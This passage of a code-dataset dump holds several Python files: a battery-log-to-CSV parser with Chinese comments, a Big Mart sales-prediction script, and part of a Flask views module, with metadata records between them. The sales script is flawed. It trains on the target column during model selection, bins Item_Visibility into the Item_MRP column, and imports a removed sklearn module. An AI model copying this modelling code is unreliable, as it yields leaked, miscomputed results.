"rest_framework.status.HTTP_201_CREATED", "line_number": 45, "usage_type": "name"}, {"api_name": "authentication.AuthTokenAuthentication", "line_number": 50, "usage_type": "name"}, {"api_name": "rest_framework.authentication.SessionAuthentication", "line_number": 50, "usage_type": "name"}, {"api_name": "authentication.RequireAuthToken", "line_number": 51, "usage_type": "name"}, {"api_name": "permissions.APIKeyPermission", "line_number": 51, "usage_type": "name"}, {"api_name": "hsreplaynet.uploads.models.UploadEvent.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "hsreplaynet.uploads.models.UploadEvent.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "hsreplaynet.uploads.models.UploadEvent", "line_number": 52, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveUpdateDestroyAPIView", "line_number": 57, "usage_type": "name"}, {"api_name": "hsreplaynet.games.models.GameReplay.objects.live", "line_number": 58, "usage_type": "call"}, {"api_name": "hsreplaynet.games.models.GameReplay.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "hsreplaynet.games.models.GameReplay", "line_number": 58, "usage_type": "name"}, {"api_name": "permissions.IsOwnerOrReadOnly", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 68, "usage_type": "name"}, {"api_name": "hsreplaynet.games.models.GameReplay.objects.live", "line_number": 69, "usage_type": "call"}, {"api_name": "hsreplaynet.games.models.GameReplay.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "hsreplaynet.games.models.GameReplay", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "265605663", "text": "# 这是一个示例 Python 脚本。\n\n# 按 Shift+F10 执行或将其替换为您的代码。\n# 按 按两次 Shift 在所有地方搜索类、文件、工具窗口、操作和设置。\nimport os\nimport sys\nimport time\nimport re\nfrom datetime import datetime\n\ndebug_verbose = 0\ndebug = 1\n\n\nclass Log_Parser_Template:\n def __init__(self,\n file_name_regular,\n file_name_sort_lambda,\n file_name_output,\n keyword_line_regular,\n keyword_field_regulart,\n keyword_time_regulart,\n keyword_head_regulart,\n keyword_field_split):\n self.file_name_regular = file_name_regular\n self.file_name_sort_lambda = file_name_sort_lambda\n self.file_name_output = file_name_output\n self.keyword_line_regular = keyword_line_regular\n self.keyword_field_regulart = keyword_field_regulart\n self.keyword_time_regulart = keyword_time_regulart\n self.keyword_head_regulart = keyword_head_regulart\n self.keyword_field_split = keyword_field_split\n\n\nLog_Parser_UNISOC = Log_Parser_Template(\n # 0-kernel.log\n file_name_regular='^\\d-kernel\\.log$',\n file_name_sort_lambda=(lambda x: int(x[0:1])),\n file_name_output='unisoc_battery.csv',\n # 5A245 <6> [27634.217721][12-02 20:18:22.217] charger-manager charger-manager: battery voltage = 3411000, OCV = 3536769, current = -1113000, capacity = 10, charger status = 2, force set full = 0, charging current = 0, charging limit current = 0, battery temperature = 513,board temperature = 583, track state = 1, charger type = 2, thm_adjust_cur = -22, charger input voltage = 0\n keyword_line_regular='.* charger-manager charger-manager:(.*)$',\n keyword_head_regulart='.* charger-manager charger-manager: battery voltage = (.*)$',\n keyword_field_regulart='(.+?)=(.+?),',\n keyword_field_split=',',\n keyword_time_regulart='^.*?\\[.*\\]\\[(.*)\\] ',\n)\n\nLog_Parsers = [Log_Parser_UNISOC]\n\n\nclass CsvItem:\n head_keyword_keypairs = {}\n\n def __init__(self):\n self.time = ''\n self.timestamp = 0.0\n self.keyword_keypairs = {}\n self.raw = ''\n self.file = ''\n self.line_number = -1\n self.head = False\n\n def dump(self):\n if len(self.time) > 0:\n print(\"time :\", self.time)\n if self.timestamp > 0:\n print(\"timestamp :\", self.timestamp)\n if len(self.keyword_keypairs) > 0:\n print(\"keypairs :\", self.keyword_keypairs)\n if len(self.raw) > 0:\n print(\"raw :\", self.raw)\n if len(self.file) > 0:\n print(\"file :\", self.file)\n if self.line_number != -1:\n print(\"line_number :\", self.line_number)\n\n @staticmethod\n def get_csv_head():\n return \",\".join([\"time\",\n \"timestamp\",\n \",\".join(list(CsvItem.head_keyword_keypairs.keys())),\n \"file\",\n \"line_number\", ])\n\n @staticmethod\n def update_head_keyword_keypairs(keys):\n for key in keys:\n if key not in CsvItem.head_keyword_keypairs:\n CsvItem.head_keyword_keypairs[key] = ''\n\n def get_csv_head_vales(self):\n values = \"\"\n for key in CsvItem.head_keyword_keypairs.keys():\n if key in self.keyword_keypairs:\n values = values + \",\" + self.keyword_keypairs[key]\n else:\n values = values + \",\"\n return values[1:] # remove the firs ,\n\n def get_csv_line(self):\n return \",\".join([self.time,\n str(self.timestamp),\n self.get_csv_head_vales(),\n self.file,\n str(self.line_number), ])\n\n\ndef process_log_line(line, keyword_time_regulart, keyword_line_regular, keyword_field_regulart,keyword_field_split, keyword_head_regulart):\n line = line.replace('\\n', '').replace('\\r', '') # remove /r/n first\n line_match_obj = re.match(keyword_line_regular, line)\n keyword_head_match_obj = re.match(keyword_head_regulart, line)\n\n if line_match_obj is not None:\n # we found something match\n item = CsvItem()\n if debug:\n print(\"keyword line :\", line)\n if keyword_head_match_obj is not None:\n item.head = True # this is a head item\n item.raw = line\n # 10-19 18:54:29.010\n time_matchObj = re.match(keyword_time_regulart, line)\n item.time = time_matchObj.group(1)\n if debug_verbose:\n print(\"time str:\", item.time)\n dt = datetime.strptime(item.time, '%m-%d %H:%M:%S.%f')\n dt = dt.replace(year=datetime.now().year)\n if debug_verbose:\n print(\"time stamp:\", dt, dt.timestamp())\n item.timestamp = dt.timestamp()\n\n csv_content = line_match_obj.group(1) + keyword_field_split\n items_match_obj = re.findall(keyword_field_regulart, csv_content)\n for item_matchObj in items_match_obj:\n print(\"items_match_obj:\", item_matchObj)\n key = item_matchObj[0].strip()\n value = item_matchObj[1].strip()\n if debug_verbose:\n print(\"items_match_obj:\", key, \":\", value)\n item.keyword_keypairs[key] = value\n return item\n else:\n return None\n\n\ndef find_last_csv_items_by_name(name, csv_items):\n for item in csv_items[::-1]:\n if item.name == name:\n return item\n return None\n\n\ndef find_first_csv_items_by_name(name, csv_items, after_item):\n after_index = 0\n if after_item is None:\n after_index = 0\n else:\n after_index = csv_items.index(after_item)\n for item in csv_items[after_index:]:\n if item.name == name:\n return item\n return None\n\n\ndef process_log_file(log_file_path, csv_items, praser):\n try:\n log_file = open(log_file_path, 'r', encoding='utf-8', errors='ignore')\n lines = log_file.readlines() # 读取全部内容 ,并以列表方式返回\n log_file.close()\n except IOError as reason:\n print('读取文件失败!' + log_file_path + \":\" + str(reason))\n return None\n line_number = 0\n item_number = 0\n last_head_item = None\n for line in lines:\n line_number += 1\n item = process_log_line(line,\n praser.keyword_time_regulart,\n praser.keyword_line_regular,\n praser.keyword_field_regulart,\n praser.keyword_field_split,\n praser.keyword_head_regulart,)\n if item is not None:\n if item.head:\n item.file = log_file_path\n item.line_number = line_number\n if debug:\n item.dump()\n csv_items.append(item)\n CsvItem.update_head_keyword_keypairs(item.keyword_keypairs.keys())\n last_head_item = item\n print(\"item:\", item_number)\n item_number = item_number + 1\n elif len(item.keyword_keypairs) > 0:\n if last_head_item is not None:\n last_head_item.keyword_keypairs.update(item.keyword_keypairs)\n CsvItem.update_head_keyword_keypairs(item.keyword_keypairs.keys())\n print(\"merge to last item:\", item.keyword_keypairs)\n else:\n print(\"unable merge ,drop one item:\", item.keyword_keypairs)\n\n\ndef save_csv(csv_log_path, csv_items):\n print('csv_items:', len(csv_items))\n try:\n csv_log = open(csv_log_path, 'w', encoding='utf-8', errors='ignore')\n if len(csv_items) > 0:\n csv_log.write(csv_items[0].get_csv_head() + \"\\n\")\n for item in csv_items:\n if debug_verbose:\n item.dump()\n csv_log.write(item.get_csv_line() + \"\\n\")\n csv_log.close()\n print('保存完成!' + csv_log_path)\n except IOError as reason:\n print('保存文件失败!' + csv_log_path + \":\" + str(reason))\n\n\nclass SatisticsAvg:\n def __init__(self):\n self.count = 0\n self.avg = 0\n\n def add(self, new_value):\n self.avg = round((self.avg * self.count + new_value) / (self.count + 1), 3)\n self.count += 1\n\n\ndef filter_file_names(file_name, file_name_regular):\n if re.match(file_name_regular, file_name) == None:\n return False\n else:\n return True\n\ndef find_log_files_in_dir(praser, dir_name):\n log_files = []\n try:\n files = os.listdir(dir_name)\n except IOError as reason:\n print('工作文件夹打开失败!' + str(reason))\n while files:\n file_name = files.pop()\n if filter_file_names(file_name, praser.file_name_regular):\n log_files.append(file_name)\n\n log_files.sort(key=praser.file_name_sort_lambda)\n return log_files\n\ndef process_work_dir(praser, work_dir_name):\n output_path = process_log_dir(praser, work_dir_name)\n if output_path is None:\n print('当前文件夹没有找到Log,尝试遍历子文件夹')\n output_dir = work_dir_name + \"\\\\\" + \"battery\"\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n try:\n subdirs = os.listdir(work_dir_name)\n except IOError as reason:\n print('工作文件夹打开失败!' + str(reason))\n save_count = 0\n while subdirs:\n file_name = subdirs.pop()\n file_path = work_dir_name + \"\\\\\" + file_name\n if os.path.isdir(file_path):\n if process_log_dir(praser, file_path, output_dir) is not None:\n output_path = output_dir # at least one file create\n\n if output_path is not None:\n os.system('start ' + output_path)\n\ndef process_log_dir(praser, dir_name, output_dir = None):\n csv_items = []\n CsvItem.head_keyword_keypairs = {}\n log_dir = dir_name\n output_filename = praser.file_name_output\n if output_dir is not None:\n output_filename = os.path.basename(dir_name) + \".csv\"\n else:\n output_dir = log_dir\n\n log_files = find_log_files_in_dir(praser, log_dir)\n\n for file_name in log_files:\n path = log_dir + \"\\\\\" + file_name\n if debug:\n print('处理 Log 文件 ', path)\n process_log_file(path, csv_items, praser)\n\n output_path = output_dir + \"\\\\\" + output_filename\n if len(csv_items) > 0:\n save_csv(output_path, csv_items)\n return output_path\n\n return None\n\n# 按间距中的绿色按钮以运行脚本。\nif __name__ == '__main__':\n work_dir = os.getcwd()\n if len(sys.argv) < 1:\n print('格式:', sys.argv[0], ' ')\n os.system('pause')\n sys.exit(2)\n if len(sys.argv) >= 2:\n work_dir = sys.argv[1]\n print('工作的文件夹:', work_dir)\n start = time.time()\n\n for praser in Log_Parsers:\n process_work_dir(praser, work_dir)\n\n end = time.time()\n print(\"耗时(秒):\", int(end - start))\n os.system('pause')\n\n# 访问 https://www.jetbrains.com/help/pycharm/ 获取 PyCharm 帮助\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.match", "line_number": 110, "usage_type": "call"}, {"api_name": "re.match", "line_number": 111, "usage_type": "call"}, {"api_name": "re.match", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 126, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 133, "usage_type": "call"}, {"api_name": "re.match", "line_number": 231, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 256, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 278, "usage_type": "call"}, {"api_name": "os.path", "line_number": 278, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 299, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 300, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 301, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 302, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 303, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 304, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 305, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 312, "usage_type": "call"}, {"api_name": "os.system", "line_number": 314, "usage_type": "call"}]} +{"seq_id": "603710510", "text": "import pandas as pd\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n#%matplotlib inline\r\nimport seaborn as sns\r\n\r\nfrom sklearn import cross_validation\r\nfrom sklearn.cross_validation import KFold, cross_val_score\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.ensemble import RandomForestRegressor,GradientBoostingRegressor, ExtraTreesRegressor\r\nfrom sklearn.neural_network import MLPRegressor\r\nimport xgboost as xgb\r\ntrain_df = pd.read_csv(\"train.csv\")\r\ntest_df = pd.read_csv(\"test.csv\")\r\ntest_df1 = pd.read_csv(\"test.csv\")\r\n\r\ntrain_df['Item_Outlet_Sales_Number'] = train_df['Item_Outlet_Sales']/train_df['Item_MRP']\r\n# convert from float to int\r\nprint(train_df.shape)\r\nprint(test_df.shape)\r\ny_Item_Outlet_Sales = pd.DataFrame(train_df.Item_Outlet_Sales.copy())\r\ny_Item_Outlet_Sales.columns = ['Item_Outlet_Sales']\r\ny_Item_Outlet_Sales_Number = train_df.Item_Outlet_Sales_Number.copy()\r\ntrain_df.drop('Item_Outlet_Sales', axis=1, inplace=True)\r\ntrain_df.drop('Item_Outlet_Sales_Number', axis=1, inplace=True)\r\ndf = pd.concat([train_df, test_df], axis=0)\r\nprint('test shape')\r\nprint(y_Item_Outlet_Sales.shape)\r\nprint(df.head())\r\nprint(df.shape)\r\nprint(df.isnull().sum())\r\ndf = df.dropna(how='all')\r\nr,c = df.shape\r\n\r\n\r\n##################################Now treatment of columns is being done #####################################################\r\n#Item_Fat_Content\r\nprint(df['Item_Fat_Content'].unique())\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].str.lower()\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].replace(['lf'], 'low fat')\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].replace(['reg'], 'regular')\r\nprint(df['Item_Fat_Content'].unique())\r\ndf['Item_Fat_Content'] = df['Item_Fat_Content'].map({'low fat' : 0, 'regular' : 1})\r\nprint(df['Item_Fat_Content'].unique())\r\n\r\n#Outlet_Location_Type\r\nprint(df['Outlet_Location_Type'].unique())\r\ndf['Outlet_Location_Type'] = df['Outlet_Location_Type'].map({'Tier 1' : 1, 'Tier 2' : 2, 'Tier 3' : 3})\r\nprint(df['Outlet_Location_Type'].unique())\r\n\r\n#Outlet_Type\r\nprint(df['Outlet_Type'].unique())\r\ndf['Outlet_Type'] = df['Outlet_Type'].map({'Supermarket Type1' : 1, 'Supermarket Type2' : 2, 'Supermarket Type3' : 3, 'Grocery Store' : 4})\r\nprint(df['Outlet_Type'].unique())\r\n\r\n#Outlet_Type\r\nprint(df['Item_Type'].unique())\r\ndf['Item_Type'] = df['Item_Type'].map({'Dairy' : 1, 'Soft Drinks' : 2, 'Meat' : 3, 'Fruits and Vegetables' : 4, 'Household' : 5, 'Baking Goods' : 6, 'Snack Foods' : 7, 'Frozen Foods' : 8, 'Breakfast' : 9, 'Health and Hygiene' : 10, 'Hard Drinks': 11, 'Canned' : 12, 'Breads' : 13, 'Starchy Foods' : 14, 'Others' : 15,'Seafood' : 16})\r\nprint(df['Item_Type'].unique())\r\n\r\nprint(df.head())\r\n\r\n# replace nan on Item weight and Outlet size\r\ndf['Item_Weight'] = df['Item_Weight'].fillna(df['Item_Weight'].median())\r\ndf['Outlet_Size'] = df['Outlet_Size'].fillna(df['Outlet_Size'].mode()[0])\r\ndf['Outlet_Size'] = df['Outlet_Size'].map({'High' : 1, 'Medium' : 2, 'Small' : 3})\r\nprint(df['Outlet_Size'].unique())\r\n\r\n#df.drop('Item_Visibility', axis=1, inplace=True)\r\n\r\n#df.hist(column='Item_MRP', bins=50)\r\n\r\nfigure = plt.figure(figsize=(8,5))\r\nplt.hist(df['Item_MRP'], bins=np.arange(df['Item_MRP'].min(), df['Item_MRP'].max()+1))\r\nplt.xlabel('Item_MRP')\r\nplt.legend()\r\nplt.show()\r\n\r\ndf['Item_Type'] = (df['Item_Type']).astype(int)\r\ndf.loc[ df['Item_MRP'] <= 69, 'Item_MRP'] = 1\r\ndf.loc[(df['Item_MRP'] > 69) & (df['Item_MRP'] <= 136), 'Item_MRP'] = 2\r\ndf.loc[(df['Item_MRP'] > 136) & (df['Item_MRP'] <= 203), 'Item_MRP'] = 3\r\ndf.loc[(df['Item_MRP'] > 203), 'Item_MRP'] = 4\r\n\r\n\r\nmax_visi = df['Item_Visibility'].max()\r\nmin_visi = df['Item_Visibility'].min()\r\nqrt_visi = (max_visi + min_visi)/4 * 1000\r\nprint(qrt_visi)\r\ndf['Item_Visibility'] = df['Item_Visibility'].astype(int)\r\ndf[\"Item_Visibility\"] = df[\"Item_Visibility\"].apply(lambda x: x * 1000)\r\ndf.loc[ df['Item_Visibility'] <= qrt_visi, 'Item_Visibility'] = 1\r\ndf.loc[(df['Item_Visibility'] > qrt_visi) & (df['Item_Visibility'] <= (2*qrt_visi)), 'Item_MRP'] = 2\r\ndf.loc[(df['Item_Visibility'] > (qrt_visi*2)) & (df['Item_Visibility'] <= (3*qrt_visi)), 'Item_MRP'] = 3\r\ndf.loc[(df['Item_MRP'] > (qrt_visi*3)), 'Item_MRP'] = 4\r\nprint(df['Item_MRP'].unique())\r\n\r\ndf[\"Outlet_Establishment_Year\"] = df[\"Outlet_Establishment_Year\"].apply(lambda x: 2013 - x)\r\n\r\n\r\n\t\t\r\nprint(df.shape)\r\nItem_Fat_Content_dummies = pd.get_dummies(df['Item_Fat_Content'],prefix=\"Item_Fat_Content\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_Fat_Content_dummies],axis=1) \r\ndf.drop('Item_Fat_Content',axis=1,inplace=True)\r\n\r\nItem_Visibility_dummies = pd.get_dummies(df['Item_Visibility'],prefix=\"Item_Visibility\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_Visibility_dummies],axis=1) \r\ndf.drop('Item_Visibility',axis=1,inplace=True)\r\n\r\nItem_Type_dummies = pd.get_dummies(df['Item_Type'],prefix=\"Item_Type\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_Type_dummies],axis=1) \r\ndf.drop('Item_Type',axis=1,inplace=True)\r\n\r\nItem_MRP_dummies = pd.get_dummies(df['Item_MRP'],prefix=\"Item_MRP\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Item_MRP_dummies],axis=1) \r\ndf.drop('Item_MRP',axis=1,inplace=True)\r\n\r\nOutlet_Size_dummies = pd.get_dummies(df['Outlet_Size'],prefix=\"Outlet_Size\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Outlet_Size_dummies],axis=1) \r\ndf.drop('Outlet_Size',axis=1,inplace=True)\r\n\r\nOutlet_Location_Type_dummies = pd.get_dummies(df['Outlet_Location_Type'],prefix=\"Outlet_Location_Type\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Outlet_Location_Type_dummies],axis=1) \r\ndf.drop('Outlet_Location_Type',axis=1,inplace=True)\r\n\r\nOutlet_Type_dummies = pd.get_dummies(df['Outlet_Type'],prefix=\"Outlet_Type\",drop_first=True)\r\n# adding dummy variables\r\ndf = pd.concat([df,Outlet_Type_dummies],axis=1) \r\ndf.drop('Outlet_Type',axis=1,inplace=True)\r\n\r\ndf.drop('Item_Identifier',axis=1,inplace=True)\r\ndf.drop('Outlet_Identifier',axis=1,inplace=True)\r\n\r\nprint(df.isnull().sum())\r\n\r\ntrain = df.iloc[:8523,]\r\ntest = df.iloc[8523:,:]\r\nprint(train.shape)\r\nprint(y_Item_Outlet_Sales.shape)\r\n\r\n\r\n#train['Item_Outlet_Sales'] = y_Item_Outlet_Sales[['Item_Outlet_Sales']]\r\nestimators = [50, 75, 100, 125, 150, 200, 250, 500]\r\n'''\r\nfor e in estimators:\r\n xg = xgb.XGBRegressor(n_estimators = e)\r\n \r\n# plt.figure(figsize=(10,10))\r\n xg.fit(train, y_Item_Outlet_Sales['Item_Outlet_Sales'])\r\n print(train.dtypes)\t\r\n print(xg.feature_importances_)\r\n xgb.plot_importance(xg, importance_type='gain')#, ax=ax1)\r\n'''\t\r\ndef prediction_function(train, test):\r\n estimators = [50, 75, 80, 100, 125, 150, 200, 250, 500]\r\n\r\n final = []\r\n\r\n for e in estimators:\r\n rf = RandomForestRegressor(random_state = 1, n_estimators = e, min_samples_split = 8, min_samples_leaf = 4)\r\n gbr = GradientBoostingRegressor(random_state = 1, n_estimators = e, min_samples_split = 8, \r\n min_samples_leaf = 4, learning_rate = 0.1)\r\n xg = xgb.XGBRegressor(n_estimators = e)\r\n\r\n rf.fit(train, train['Item_Outlet_Sales'])\r\n predictions_rf = rf.predict(test)\r\n predictions_rf = predictions_rf.astype(int)\r\n\r\n gbr.fit(train, train['Item_Outlet_Sales'])\r\n predictions_gbr = gbr.predict(test)\r\n predictions_gbr = predictions_gbr.astype(int)\r\n\r\n xg.fit(train, train['Item_Outlet_Sales'])\r\n predictions_xg = xg.predict(test)\r\n predictions_xg = predictions_xg.astype(int)\r\n\r\n mse_rf = (np.sqrt(mean_squared_error(test['Item_Outlet_Sales'], predictions_rf)), 'RF')\r\n mse_gbr = (np.sqrt(mean_squared_error(test['Item_Outlet_Sales'], predictions_gbr)), 'GBR')\r\n mse_xg = (np.sqrt(mean_squared_error(test['Item_Outlet_Sales'], predictions_xg)), 'XGB')\r\n\r\n error_min = min(mse_rf, min(mse_gbr, mse_xg))\r\n# print(error_min)\r\n final.append((error_min, e))\r\n\r\n min_final = min(final)\r\n print(\"Minimum MSE, regressor to use and number of estimators: \"+str(min_final))\r\n return list(min_final)\r\ntrain = pd.concat([train, y_Item_Outlet_Sales], axis=1)\r\n#print(train.head())\r\n\t\r\ntrain_tmp = train[:int(train.shape[0]*0.8)]\r\ntest_tmp = train[int(train.shape[0]*0.8):]\r\n\r\nmin_final = prediction_function(train_tmp, test_tmp)\r\n\r\ne_to_use = min_final[1]\r\nregressor_to_use = min_final[0][1]\r\n# print(\"Mimimum RMSE error was for \"+str(regressor_to_use)+\" with \"+str(e_to_use)+\" estimators\")\r\n\r\nif(regressor_to_use == 'RF'):\r\n reg = RandomForestRegressor(random_state = 1, n_estimators = e_to_use, min_samples_split = 8, min_samples_leaf = 4)\r\nelif(regressor_to_use == 'GBR'):\r\n reg = GradientBoostingRegressor(random_state = 1, n_estimators = e_to_use, min_samples_split = 8, min_samples_leaf = 4, learning_rate = 0.2)\r\nelse:\r\n reg = xgb.XGBRegressor(n_estimators = e_to_use)\r\ntrain.drop('Item_Outlet_Sales', axis=1, inplace=True)\r\nreg.fit(train, y_Item_Outlet_Sales['Item_Outlet_Sales'])\r\npredictions = reg.predict(test)\r\npredictions = predictions.astype(int)\r\n\r\nsub = pd.DataFrame({'Item_Identifier' : test_df1['Item_Identifier'], 'Outlet_Identifier' : test_df1['Outlet_Identifier'], 'Item_Outlet_Sales' : predictions})\r\nsub.to_csv('output.csv', index=False)", "sub_path": "AnalyticsVidhya/bigdatamart/Sol1.py", "file_name": "Sol1.py", "file_ext": "py", "file_size_in_byte": 9272, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "pandas.get_dummies", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 111, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 121, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 168, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 169, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 186, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 187, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 209, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingRegressor", "line_number": 211, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 213, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 219, "usage_type": "call"}]} +{"seq_id": "342810913", "text": "import json\nimport os.path\n\nfrom flask import redirect, render_template, request, send_from_directory, url_for\nfrom flask_babelex import gettext\nfrom markupsafe import Markup\n\nfrom project import app, cache_path, dump_path, robots_txt_file, sitemap_file\nfrom project.services.admin import upsert_settings\nfrom project.views.utils import track_analytics\n\n\n@app.route(\"/\")\ndef home():\n if \"src\" in request.args:\n track_analytics(\"home\", \"\", request.args[\"src\"])\n return redirect(url_for(\"home\"))\n\n structured_data = json.dumps(\n {\n \"@context\": \"http://schema.org\",\n \"@type\": \"WebSite\",\n \"name\": \"Oveda\",\n \"url\": url_for(\"home\", _external=True),\n }\n )\n\n return render_template(\n \"home.html\",\n structured_data=structured_data,\n admin_unit_create_requires_admin=app.config[\"ADMIN_UNIT_CREATE_REQUIRES_ADMIN\"],\n )\n\n\n@app.route(\"/example\")\ndef example():\n return render_template(\"example.html\")\n\n\n@app.route(\"/tos\")\ndef tos():\n title = gettext(\"Terms of service\")\n settings = upsert_settings()\n content = Markup(settings.tos)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/legal_notice\")\ndef legal_notice():\n title = gettext(\"Legal notice\")\n settings = upsert_settings()\n content = Markup(settings.legal_notice)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/contact\")\ndef contact():\n title = gettext(\"Contact\")\n settings = upsert_settings()\n content = Markup(settings.contact)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/privacy\")\ndef privacy():\n title = gettext(\"Privacy\")\n settings = upsert_settings()\n content = Markup(settings.privacy)\n return render_template(\"legal.html\", title=title, content=content)\n\n\n@app.route(\"/developer\")\ndef developer():\n file_name = \"all.zip\"\n all_path = os.path.join(dump_path, file_name)\n dump_file = None\n\n if os.path.exists(all_path):\n dump_file = {\n \"url\": url_for(\"dump_files\", path=file_name),\n \"size\": os.path.getsize(all_path),\n \"ctime\": os.path.getctime(all_path),\n }\n else:\n app.logger.info(\"No file at %s\" % all_path)\n\n return render_template(\"developer/read.html\", dump_file=dump_file)\n\n\n@app.route(\"/favicon.ico\")\ndef static_from_root():\n return send_from_directory(app.static_folder, request.path[1:])\n\n\n@app.route(\"/robots.txt\")\ndef robots_txt():\n return send_from_directory(cache_path, robots_txt_file)\n\n\n@app.route(\"/sitemap.xml\")\ndef sitemap_xml():\n return send_from_directory(cache_path, sitemap_file)\n", "sub_path": "project/views/root.py", "file_name": "root.py", "file_ext": "py", "file_size_in_byte": 2699, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.request.args", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "project.views.utils.track_analytics", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.redirect", 